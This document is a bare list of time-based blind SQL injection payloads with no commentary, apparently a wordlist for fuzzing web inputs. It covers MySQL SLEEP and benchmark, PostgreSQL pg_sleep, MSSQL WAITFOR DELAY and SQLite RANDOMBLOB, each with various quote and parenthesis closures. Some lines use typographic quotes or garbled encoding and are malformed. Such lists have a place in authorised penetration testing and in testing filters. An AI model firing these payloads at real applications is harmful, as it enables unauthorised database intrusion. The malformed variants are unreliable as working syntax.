'
"
' /
%22
%27
@@versionz
SLEP(5)
input)%23
" or benchmark(10000000,MD5(1))#
" or pg_sleep(5)--
" or sleep(5)#
" or sleep(5)="
") or benchmark(10000000,MD5(1))#
") or pg_sleep(5)--
") or sleep(5)="
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(5)--
")) or sleep(5)="
"));waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
&&SLEEP(5)
&&SLEEP(5)#
&&SLEEP(5)--
' AnD SLEEP(5) ANd '1
' or benchmark(10000000,MD5(1))#
' or pg_sleep(5)--
' or sleep(5)#
' or sleep(5)='
'&&SLEEP(5)&&'1
') or benchmark(10000000,MD5(1))#
') or pg_sleep(5)--
') or sleep(5)='
')) or benchmark(10000000,MD5(1))#
')) or pg_sleep(5)--
')) or sleep(5)='
'));waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
'\"
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
));waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
+ SLEEP(10) + '
+benchmark(3200,SHA1(1))+'
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(5)--
1 or sleep(5)#
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(5)--
1) or sleep(5)#
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(5)--
1)) or sleep(5)#
;waitfor delay '0:0:5'--
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
AnD SLEEP(5)
AnD SLEEP(5)#
AnD SLEEP(5)--
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)#
ORDER BY SLEEP(5)--
RANDOMBLOB(1000000000/2)
RANDOMBLOB(500000000/2)
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
benchmark(10000000,MD5(1))#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))#
benchmark(50000000,MD5(1))--
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))--
or pg_SLEEP(5)
or pg_SLEEP(5)#
or pg_SLEEP(5)--
pg_SLEEP(5)
pg_SLEEP(5)#
pg_SLEEP(5)--
pg_sleep(5)--
sleep(5)#
waitfor delay '00:00:05'
waitfor delay '00:00:05'#
waitfor delay '00:00:05'--
or sleep 5 —-
or sleep 5
or sleep(5) —-
or sleep(5)
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5) —-
1 or pg_sleep(5) —-
“ or pg_sleep(5) —-
‘ or pg_sleep(5) —-
1) or pg_sleep(5) --
;waitfor delay ‘0:0:5’ —-
‘;WAITFOR DELAY ‘0:0:5’ —-
);waitfor delay ‘0:0:5’ —-
‘;waitfor delay ‘0:0:5’ —-
“;waitfor delay ‘0:0:5’ —-
‘);waitfor delay ‘0:0:5’ —-
“);waitfor delay ‘0:0:5’ —-
));waitfor delay ‘0:0:5’ —-
‘));waitfor delay ‘0:0:5’ —-
“));waitfor delay ‘0:0:5’ —-
“) IF (1=1) WAITFOR DELAY ‘0:0:5’ —-
‘;%5waitfor%5delay%5’0:0:5'%5 —- %5
‘ WAITFOR DELAY ‘0:0:5’ —-
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
